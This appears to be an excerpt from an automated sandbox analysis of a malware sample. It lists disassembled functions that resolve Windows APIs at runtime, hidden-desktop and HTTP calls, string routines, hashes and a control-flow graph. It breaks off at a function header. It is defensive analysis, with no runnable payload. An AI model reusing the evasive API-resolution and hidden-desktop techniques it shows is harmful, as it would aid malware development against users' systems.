                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: b6d9f103886346b45c1b8f041d0eaaad6aad681d62dc49d80f136b9f0e9d1ad4
                        • Instruction ID: 477f0e1542668a7bfcbc659b30277150687afaac8ad40fd6e6dab8c4c9018c2b
                        • Opcode Fuzzy Hash: b6d9f103886346b45c1b8f041d0eaaad6aad681d62dc49d80f136b9f0e9d1ad4
                        • Instruction Fuzzy Hash: CFF0B4B1A40248ABD720DF88DD49B9EFBBCF704B21F000216FA15E3680D778190486A6
                        Function 005166E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 5166e0-5166e7 634 5166ed-516af9 GetProcAddress * 43 633->634 635 516afe-516b92 LoadLibraryA * 8 633->635 634->635 636 516b94-516c03 GetProcAddress * 5 635->636 637 516c08-516c0f 635->637 636->637 638 516cd2-516cd9 637->638 639 516c15-516ccd GetProcAddress * 8 637->639 640 516cdb-516d4a GetProcAddress * 5 638->640 641 516d4f-516d56 638->641 639->638 640->641 642 516de9-516df0 641->642 643 516d5c-516de4 GetProcAddress * 6 641->643 644 516f10-516f17 642->644 645 516df6-516f0b GetProcAddress * 12 642->645 643->642 646 516f19-516f88 GetProcAddress * 5 644->646 647 516f8d-516f94 644->647 645->644 646->647 648 516fc1-516fc8 647->648 649 516f96-516fbc GetProcAddress * 2 647->649 650 516ff5-516ffc 648->650 651 516fca-516ff0 GetProcAddress * 2 648->651 649->648 652 517002-5170e8 GetProcAddress * 10 650->652 653 5170ed-5170f4 650->653 651->650 652->653 654 517152-517159 653->654 655 5170f6-51714d GetProcAddress * 4 653->655 656 51715b-517169 GetProcAddress 654->656 657 51716e-517175 654->657 655->654 656->657 658 5171d3 657->658 659 517177-5171ce GetProcAddress * 4 657->659 659->658
                        APIs
                        • GetProcAddress.KERNEL32(75550000,01026400), ref: 005166F5
                        • GetProcAddress.KERNEL32(75550000,010263E0), ref: 0051670D
                        • GetProcAddress.KERNEL32(75550000,01038FB8), ref: 00516726
                        • GetProcAddress.KERNEL32(75550000,01038EF8), ref: 0051673E
                        • GetProcAddress.KERNEL32(75550000,0103CA58), ref: 00516756
                        • GetProcAddress.KERNEL32(75550000,0103CAA0), ref: 0051676F
                        • GetProcAddress.KERNEL32(75550000,0102B400), ref: 00516787
                        • GetProcAddress.KERNEL32(75550000,0103CB00), ref: 0051679F
                        • GetProcAddress.KERNEL32(75550000,0103CA88), ref: 005167B8
                        • GetProcAddress.KERNEL32(75550000,0103CBA8), ref: 005167D0
                        • GetProcAddress.KERNEL32(75550000,0103CBF0), ref: 005167E8
                        • GetProcAddress.KERNEL32(75550000,01026340), ref: 00516801
                        • GetProcAddress.KERNEL32(75550000,01026300), ref: 00516819
                        • GetProcAddress.KERNEL32(75550000,01026620), ref: 00516831
                        • GetProcAddress.KERNEL32(75550000,01026640), ref: 0051684A
                        • GetProcAddress.KERNEL32(75550000,0103C9E0), ref: 00516862
                        • GetProcAddress.KERNEL32(75550000,0103CBD8), ref: 0051687A
                        • GetProcAddress.KERNEL32(75550000,0102B568), ref: 00516893
                        • GetProcAddress.KERNEL32(75550000,01026660), ref: 005168AB
                        • GetProcAddress.KERNEL32(75550000,0103C9B0), ref: 005168C3
                        • GetProcAddress.KERNEL32(75550000,0103CAD0), ref: 005168DC
                        • GetProcAddress.KERNEL32(75550000,0103CBC0), ref: 005168F4
                        • GetProcAddress.KERNEL32(75550000,0103C9C8), ref: 0051690C
                        • GetProcAddress.KERNEL32(75550000,010262C0), ref: 00516925
                        • GetProcAddress.KERNEL32(75550000,0103C9F8), ref: 0051693D
                        • GetProcAddress.KERNEL32(75550000,0103CB78), ref: 00516955
                        • GetProcAddress.KERNEL32(75550000,0103CA28), ref: 0051696E
                        • GetProcAddress.KERNEL32(75550000,0103CB18), ref: 00516986
                        • GetProcAddress.KERNEL32(75550000,0103CAB8), ref: 0051699E
                        • GetProcAddress.KERNEL32(75550000,0103CA70), ref: 005169B7
                        • GetProcAddress.KERNEL32(75550000,0103CA40), ref: 005169CF
                        • GetProcAddress.KERNEL32(75550000,0103CAE8), ref: 005169E7
                        • GetProcAddress.KERNEL32(75550000,0103CB30), ref: 00516A00
                        • GetProcAddress.KERNEL32(75550000,01039F88), ref: 00516A18
                        • GetProcAddress.KERNEL32(75550000,0103C920), ref: 00516A30
                        • GetProcAddress.KERNEL32(75550000,0103CB90), ref: 00516A49
                        • GetProcAddress.KERNEL32(75550000,01026320), ref: 00516A61
                        • GetProcAddress.KERNEL32(75550000,0103CC08), ref: 00516A79
                        • GetProcAddress.KERNEL32(75550000,01026360), ref: 00516A92
                        • GetProcAddress.KERNEL32(75550000,0103C938), ref: 00516AAA
                        • GetProcAddress.KERNEL32(75550000,0103CB48), ref: 00516AC2
                        • GetProcAddress.KERNEL32(75550000,01026380), ref: 00516ADB
                        • GetProcAddress.KERNEL32(75550000,010263A0), ref: 00516AF3
                        • LoadLibraryA.KERNEL32(0103C998,0051051F), ref: 00516B05
                        • LoadLibraryA.KERNEL32(0103CB60), ref: 00516B16
                        • LoadLibraryA.KERNEL32(0103C980), ref: 00516B28
                        • LoadLibraryA.KERNEL32(0103C950), ref: 00516B3A
                        • LoadLibraryA.KERNEL32(0103C968), ref: 00516B4B
                        • LoadLibraryA.KERNEL32(0103CA10), ref: 00516B5D
                        • LoadLibraryA.KERNEL32(0103CC50), ref: 00516B6F
                        • LoadLibraryA.KERNEL32(0103CDB8), ref: 00516B80
                        • GetProcAddress.KERNEL32(75750000,01026700), ref: 00516B9C
                        • GetProcAddress.KERNEL32(75750000,0103CCE0), ref: 00516BB4
                        • GetProcAddress.KERNEL32(75750000,010389E0), ref: 00516BCD
                        • GetProcAddress.KERNEL32(75750000,0103CF08), ref: 00516BE5
                        • GetProcAddress.KERNEL32(75750000,010266A0), ref: 00516BFD
                        • GetProcAddress.KERNEL32(73CC0000,0102B180), ref: 00516C1D
                        • GetProcAddress.KERNEL32(73CC0000,010268A0), ref: 00516C35
                        • GetProcAddress.KERNEL32(73CC0000,0102B090), ref: 00516C4E
                        • GetProcAddress.KERNEL32(73CC0000,0103CEA8), ref: 00516C66
                        • GetProcAddress.KERNEL32(73CC0000,0103CE18), ref: 00516C7E
                        • GetProcAddress.KERNEL32(73CC0000,01026680), ref: 00516C97
                        • GetProcAddress.KERNEL32(73CC0000,010267A0), ref: 00516CAF
                        • GetProcAddress.KERNEL32(73CC0000,0103CC20), ref: 00516CC7
                        • GetProcAddress.KERNEL32(757E0000,01026940), ref: 00516CE3
                        • GetProcAddress.KERNEL32(757E0000,01026720), ref: 00516CFB
                        • GetProcAddress.KERNEL32(757E0000,0103CDE8), ref: 00516D14
                        • GetProcAddress.KERNEL32(757E0000,0103CC38), ref: 00516D2C
                        • GetProcAddress.KERNEL32(757E0000,01026880), ref: 00516D44
                        • GetProcAddress.KERNEL32(758D0000,0102B310), ref: 00516D64
                        • GetProcAddress.KERNEL32(758D0000,0102B2C0), ref: 00516D7C
                        • GetProcAddress.KERNEL32(758D0000,0103CE90), ref: 00516D95
                        • GetProcAddress.KERNEL32(758D0000,010267E0), ref: 00516DAD
                        • GetProcAddress.KERNEL32(758D0000,01026820), ref: 00516DC5
                        • GetProcAddress.KERNEL32(758D0000,0102AF00), ref: 00516DDE
                        • GetProcAddress.KERNEL32(76BE0000,0103CCF8), ref: 00516DFE
                        • GetProcAddress.KERNEL32(76BE0000,01026840), ref: 00516E16
                        • GetProcAddress.KERNEL32(76BE0000,01038870), ref: 00516E2F
                        • GetProcAddress.KERNEL32(76BE0000,0103CEC0), ref: 00516E47
                        • GetProcAddress.KERNEL32(76BE0000,0103CE30), ref: 00516E5F
                        • GetProcAddress.KERNEL32(76BE0000,01026780), ref: 00516E78
                        • GetProcAddress.KERNEL32(76BE0000,01026760), ref: 00516E90
                        • GetProcAddress.KERNEL32(76BE0000,0103CD70), ref: 00516EA8
                        • GetProcAddress.KERNEL32(76BE0000,0103CD28), ref: 00516EC1
                        • GetProcAddress.KERNEL32(76BE0000,CreateDesktopA), ref: 00516ED7
                        • GetProcAddress.KERNEL32(76BE0000,OpenDesktopA), ref: 00516EEE
                        • GetProcAddress.KERNEL32(76BE0000,CloseDesktop), ref: 00516F05
                        • GetProcAddress.KERNEL32(75670000,01026740), ref: 00516F21
                        • GetProcAddress.KERNEL32(75670000,0103CE60), ref: 00516F39
                        • GetProcAddress.KERNEL32(75670000,0103CD58), ref: 00516F52
                        • GetProcAddress.KERNEL32(75670000,0103CE00), ref: 00516F6A
                        • GetProcAddress.KERNEL32(75670000,0103CE48), ref: 00516F82
                        • GetProcAddress.KERNEL32(759D0000,010268C0), ref: 00516F9E
                        • GetProcAddress.KERNEL32(759D0000,01026960), ref: 00516FB6
                        • GetProcAddress.KERNEL32(76D80000,01026800), ref: 00516FD2
                        • GetProcAddress.KERNEL32(76D80000,0103CC68), ref: 00516FEA
                        • GetProcAddress.KERNEL32(6F5C0000,010266C0), ref: 0051700A
                        • GetProcAddress.KERNEL32(6F5C0000,010269A0), ref: 00517022
                        • GetProcAddress.KERNEL32(6F5C0000,010267C0), ref: 0051703B
                        • GetProcAddress.KERNEL32(6F5C0000,0103CC80), ref: 00517053
                        • GetProcAddress.KERNEL32(6F5C0000,01026980), ref: 0051706B
                        • GetProcAddress.KERNEL32(6F5C0000,010269C0), ref: 00517084
                        • GetProcAddress.KERNEL32(6F5C0000,010269E0), ref: 0051709C
                        • GetProcAddress.KERNEL32(6F5C0000,01026A00), ref: 005170B4
                        • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 005170CB
                        • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 005170E2
                        • GetProcAddress.KERNEL32(75480000,0103CE78), ref: 005170FE
                        • GetProcAddress.KERNEL32(75480000,010388E0), ref: 00517116
                        • GetProcAddress.KERNEL32(75480000,0103CD40), ref: 0051712F
                        • GetProcAddress.KERNEL32(75480000,0103CD10), ref: 00517147
                        • GetProcAddress.KERNEL32(753B0000,01026860), ref: 00517163
                        • GetProcAddress.KERNEL32(6EB50000,0103CDD0), ref: 0051717F
                        • GetProcAddress.KERNEL32(6EB50000,01026A20), ref: 00517197
                        • GetProcAddress.KERNEL32(6EB50000,0103CD88), ref: 005171B0
                        • GetProcAddress.KERNEL32(6EB50000,0103CDA0), ref: 005171C8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                        • API String ID: 2238633743-3468015613
                        • Opcode ID: 796eabaf35e5cf197014f462510a6dbd41c513199b8159f6bf4a27a8b94b5749
                        • Instruction ID: 85366ab8d62fe571a6b7aedf9cc7fe95f86768309a762faa4ea927df215f1c72
                        • Opcode Fuzzy Hash: 796eabaf35e5cf197014f462510a6dbd41c513199b8159f6bf4a27a8b94b5749
                        • Instruction Fuzzy Hash: 656284B450220ADFD7B4DF64ED48E2637B9F788300B08D519EA5593364EB3D9843DB29
                        Function 0050F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(0051CFEC), ref: 0050F1D5
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F1F1
                        • lstrlen.KERNEL32(0051CFEC), ref: 0050F1FC
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F215
                        • lstrlen.KERNEL32(0051CFEC), ref: 0050F220
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F239
                        • lstrcpy.KERNEL32(00000000,00524FA0), ref: 0050F25E
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F28C
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F2C0
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050F2F0
                        • lstrlen.KERNEL32(010263C0), ref: 0050F315
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: 18b881b4ec0da9bf6ac7936143a0a54296f1404969fdb4090ae493975ad3ec4a
                        • Instruction ID: 31d1b0dfcdffe7154d7c5705422efdd88e689ad84c1826175984ba55e3255266
                        • Opcode Fuzzy Hash: 18b881b4ec0da9bf6ac7936143a0a54296f1404969fdb4090ae493975ad3ec4a
                        • Instruction Fuzzy Hash: D2A28170A012068FDB30DF66D949A6EBBF5BF44304F18847AE909DB6A1DB39DC42CB54
                        Function 0050FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00510013
                        • lstrlen.KERNEL32(0051CFEC), ref: 005100BD
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005100E1
                        • lstrlen.KERNEL32(0051CFEC), ref: 005100EC
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00510110
                        • lstrlen.KERNEL32(0051CFEC), ref: 0051011B
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0051013F
                        • lstrlen.KERNEL32(0051CFEC), ref: 0051015A
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00510189
                        • lstrlen.KERNEL32(0051CFEC), ref: 00510194
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005101C3
                        • lstrlen.KERNEL32(0051CFEC), ref: 005101CE
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00510206
                        • lstrlen.KERNEL32(0051CFEC), ref: 00510250
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00510288
                        • lstrcpy.KERNEL32(00000000,?), ref: 0051059B
                        • lstrlen.KERNEL32(01026600), ref: 005105AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 005105D7
                        • lstrcat.KERNEL32(00000000,?), ref: 005105E3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0051060E
                        • lstrlen.KERNEL32(0103D9A8), ref: 00510625
                        • lstrcpy.KERNEL32(00000000,?), ref: 0051064C
                        • lstrcat.KERNEL32(00000000,?), ref: 00510658
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00510681
                        • lstrlen.KERNEL32(010265E0), ref: 00510698
                        • lstrcpy.KERNEL32(00000000,?), ref: 005106C9
                        • lstrcat.KERNEL32(00000000,?), ref: 005106D5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00510706
                        • lstrcpy.KERNEL32(00000000,010388D0), ref: 0051074B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1557
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F1579
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F159B
                          • Part of subcall function 004F1530: lstrcpy.KERNEL32(00000000,?), ref: 004F15FF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0051077F
                        • lstrcpy.KERNEL32(00000000,0103DBE8), ref: 005107E7
                        • lstrcpy.KERNEL32(00000000,01038B10), ref: 00510858
                        • lstrcpy.KERNEL32(00000000,fplugins), ref: 005108CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00510928
                        • lstrcpy.KERNEL32(00000000,01038A70), ref: 005109F8
                          • Part of subcall function 004F24E0: lstrcpy.KERNEL32(00000000,?), ref: 004F2528
                          • Part of subcall function 004F24E0: lstrcpy.KERNEL32(00000000,?), ref: 004F254E
                          • Part of subcall function 004F24E0: lstrcpy.KERNEL32(00000000,?), ref: 004F2577
                        • lstrcpy.KERNEL32(00000000,01038AE0), ref: 00510ACE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00510B81
                        • lstrcpy.KERNEL32(00000000,01038AE0), ref: 00510D58
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID: fplugins
                        • API String ID: 2500673778-38756186
                        • Opcode ID: 58aa33de28beebd2232ab2f734938217d8da5e7905f82740e75d151645694ea7
                        • Instruction ID: cd99a038ad3b5dbb53fec0615a19ff66848ec562fff3ce34f814c4d0bac4db69
                        • Opcode Fuzzy Hash: 58aa33de28beebd2232ab2f734938217d8da5e7905f82740e75d151645694ea7
                        • Instruction Fuzzy Hash: D5E29270A053418FD734DF29C489BAAFBE0BF88304F58856ED54D8B292DB75D886CB46
                        Function 0050F2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(010263C0), ref: 0050F315
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050F3A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050F3C7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050F47B
                        • lstrcpy.KERNEL32(00000000,010263C0), ref: 0050F4BB
                        • lstrcpy.KERNEL32(00000000,01038830), ref: 0050F4EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050F59E
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0050F61C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050F64C
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050F69A
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0050F718
                        • lstrlen.KERNEL32(01038980), ref: 0050F746
                        • lstrcpy.KERNEL32(00000000,01038980), ref: 0050F771
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050F793
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050F7E4
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0050FA32
                        • lstrlen.KERNEL32(01038940), ref: 0050FA60
                        • lstrcpy.KERNEL32(00000000,01038940), ref: 0050FA8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050FAAD
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050FAFE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: ERROR
                        • API String ID: 367037083-2861137601
                        • Opcode ID: f1e3b2568a7552a486b589e13038e480c7ab48473ea76b33b500f9f0f819aa5f
                        • Instruction ID: 9547335614e898c3aeea44e5a2df92fae6159273087da8d191bb2c5bb9189c9a
                        • Opcode Fuzzy Hash: f1e3b2568a7552a486b589e13038e480c7ab48473ea76b33b500f9f0f819aa5f
                        • Instruction Fuzzy Hash: 0FF13970A01206CFDB34CF2AD944A6ABBE5BF44314F18C4BED9099B6A1D73ADC42CB55
                        Function 00508CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
